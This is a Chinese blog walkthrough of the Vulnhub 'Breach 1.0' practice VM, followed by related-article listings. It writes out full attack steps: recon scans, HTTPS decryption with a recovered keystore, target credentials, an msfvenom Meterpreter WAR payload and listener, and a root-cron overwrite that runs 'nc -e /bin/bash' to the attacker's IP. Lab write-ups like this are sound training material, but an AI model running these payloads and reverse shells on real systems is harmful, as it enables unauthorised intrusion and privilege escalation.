Vulnhub靶场-breach1

最新推荐文章于 2023-10-19 23:12:08 发布
最新推荐文章于 2023-10-19 23:12:08 发布
阅读量113 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43601251/article/details/131692083
版权

一、靶场搭建

1. 下载靶场ova文件导入到VMware中**

2.将靶场设置成仅主机模式

在这里插入图片描述

3.配置静态ip,将ip 网段设置成192.168.110.0

在这里插入图片描述

二、信息收集

1.端口信息收集

nmap扫描如下:

nmap -T4 -A -v 192.168.110.140

在这里插入图片描述

2.CMS识别

whatweb识别如下:

 whatweb http://192.168.110.140/

在这里插入图片描述

3.目录扫描

dirb目录扫描如下

dirb http://192.168.110.140/

在这里插入图片描述

4.查看网页源代码和其他信息

在这里插入图片描述

(1)点击进入网站主页

在这里插入图片描述

(2)发现这个这串编码,对他进行两次MD5解密得到

pgibbons:damnitfeel$goodtobeagang$ta

(3)登录网站
顺利的话卡死了索拉卡京东方撒
(4)查看邮件内容发现下载链接,下载keystore
在这里插入图片描述
(5)通过测试发现还有一个链接下载的pcap文件,在content目录下

5.解密HTTPS流量

(1)用wirshark打开pcap文件
在这里插入图片描述
(2)在JDK中有可以解密https的工具,利用该工具生成密钥

keytool -genkeypair -alias wy -keyalg RSA -keystore F:\漏洞靶机\Breach-1.0\密钥\wy.keystore -storetype pkcs12

(3)生成https证书

 keytool -export -alias wy -keystore F:\漏洞靶机\Breach-1.0\密钥\wy.keystore -file F:\漏洞靶机\Breach-1.0\密钥\wy.crt

(4)导出p12文件

 keytool -importkeystore -srckeystore C:\Users\Administrator\Downloads\keystore -destkeystore F:\漏洞靶机\Breach-1.0\密钥\tomcat.p12 -deststoretype PKCS12 -srcalias tomcat

(5)在Wirshark中打开p12文件解密https流量
在这里插入图片描述
(6)成功解密https流量,并且收集到后台管理系统地址和账号密码
在这里插入图片描述
(7)访问后台管理系统

 https://192.168.110.140:8443/_M@nag3Me/html

账号密码在认证包中 tomcat:Tt\5D8F(#!*u=G)4m7zB
在这里插入图片描述开启BP拦截后才可以登录
在这里插入图片描述

6.Tomcat后台利用

(1)MSF生成war包木马文件

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war

(2)kali设置监听

msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.110.128
set LPORT 4444
exploit

(3)访问生成的war包反弹shell
在这里插入图片描述
在这里插入图片描述

6.Linux提权

(1)获取交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
(2)查看apache下的www目录文件
在这里插入图片描述
(3)查看数据库文件 得到数据库账号密码

cat 0d93f85c5061c44cdffeb8381b2772fd.php

(4)登录数据库并获取用户名和密码

mysql -u root -p

show databases

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用MD5解密,得到账号和密码
milton
thelaststraw
(5)用账号密码登录并查看历史命令发现了blumbergh 账户
在这里插入图片描述
![在这里插入图片描述](https://img-blog.csdnimg.cn/72aa4641a9f8413e9c3c7d92b484aaa4.png#pic_center
在这里插入图片描述
(6)下载图片查看隐藏在图片中的密码

wget http://192.168.110.140/images/bill.png
strings  bill.png

账号和密码
blumbergh
coffeestains
(7)登录账户查看历史命令
在这里插入图片描述
执行命令发现定时任务每三分钟执行一次,可以用tee命令覆盖tidyup.sh

cd /usr/share/cleanup
cat tidyup

echo "nc -e /bin/bash 192.168.110.128 5555"  >  shell.txt
sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

(8)监听本机5555端口

nc -lvvp 5555

(9)获得root权限
在这里插入图片描述

qq_43601251
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
email-breach
04-01
电子邮件违规 包含我在进行渗透测试时个人丢弃的所有电子邮件 我已删除所有在转储中多次出现的重复电子邮件 随时欢迎您添加更多电子邮件并扩展列表。 在将重复项添加到此列表之前,请确保将其删除。...
SCP-Contaiment-Breach
03-20
SCP-Contaiment-Breach
Vulnhub之Breach1.0靶场练习
m0_46371267的博客
02-22 3847
靶机信息 下载链接: https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件 Pasted image 20220221090234.png 2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。 Pasted image 20220221090526.png Pasted
Vulhub靶场环境搭建
读书 买花 长大
02-23 2488
vulhub
kali linux 下搭建 Vulhub 靶场(图文详解)
m0_63521991的博客
08-08 3864
【在kali linux 下搭建vulhub靶场及其依赖】关于kali、docker、vulhub的简介,靶场的开启、关闭、注意事项
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2386
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
CentOS7-搭建-Vulhub靶场(安装包方式)
剁椒鱼头没剁椒的博客
02-08 2610
Vulhub:是一个面向大众的开源漏洞靶场,无需docker知识,仅需要执行两条简单的命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现更加简单,让入门小白可以更加专注于漏洞本身。
Vulhub漏洞靶场搭建
Innocence_0的博客
09-20 940
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
hull-breach:由Godot 3.0.2制成的2D街机射击游戏,具有水下设置
05-08
压缩包文件名为“hull-breach-master”,表明这是游戏的源代码仓库或者开发版本。通常,这个文件夹会包含项目文件、资源、脚本、配置文件等。开发者或学习者可以通过查看这些文件,了解游戏的具体实现方式,学习如何...
EasyFrontier-Breach:在邮件系统中使用Flask para Verificar进行验证的方法,使用GitHub,Pastebin或Google
02-18
在文件列表"EasyFrontier-Breach-main"中,可能包含了以下内容: 1. `app.py`:主Flask应用程序文件,包含路由定义和视图函数。 2. `config.py`:配置文件,可能包括与GitHub、Pastebin和Google API的凭证。 3. `...
【环境搭建-04】CentOS上搭建Vulhub靶场
m0_64378913的博客
07-01 3818
(1) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 (2) 该靶场旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。(1)如果是在真实机中部署该靶场则直接跳过该步骤; (2)在虚拟中安装CentOS可以参考文章《【Linux系统】第1节 CentOS7虚拟机安装》。本小节分享时,Linux操作系统为CentOS7。主要操作步骤如下: (1)打开终端,切换至root用户,使用命令:进行安装。安装过程中有多次需要确认,输入
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2283
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub之devguru靶场打靶
最新发布
maple_leaf
10-19 483
​ Devguru是vulnhub中一个靶场,DevGuru 是一家虚构的网络开发公司,聘请您进行渗透测试评估。您的任务是在其公司网站上查找漏洞并获得root
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1219
Vulnhub靶场Breach1.0详解
Vulnhub 渗透练习(一)—— Breach 1.0
shinygod的博客
02-14 577
跟着大佬们的步伐结合自己的思考,学会了很多东西,很多平时不曾注意到的点,也稍微知道了一些渗透的简要步骤。
vulnhub靶场】Breach1打靶过程记录
didiplus
07-18 1386
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分都是虚拟机镜像文件,预先设计各种漏洞需要使用VMware或者VirtualBox运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的root权限和查看flag。.........
Vulnhub靶场之Breach1.0
shy的博客
05-19 950
靶机IP地址发现: 1、arp-scan --interface eth1 192.168.110.1/24 2、 nmap -sP 192.168.110.1/24 3、 fping -a -g 192.168.110.1/24 4、linux:for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done windows:for /l %i in (1,1,
VulnHub渗透测试实战靶场 - Breach 1.0
LYJ20010728的博客
08-04 1097
Vulnhub - Breach-1.0环境下载Breach-1.0靶机搭建渗透过程信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用 VMware虚拟机配置有静态IP地址:192.168.110.140,需要将虚拟机网卡设置为host-only方式 攻击机IP:192.168.110.128 靶机IP:192.168.110.140 渗透过程 信息搜集 使用arp-scan来检测我们的目
putty WARNING - POTENTIAL SECURITY BREACH!
07-27
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [PuTTY用户手册(十四)]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值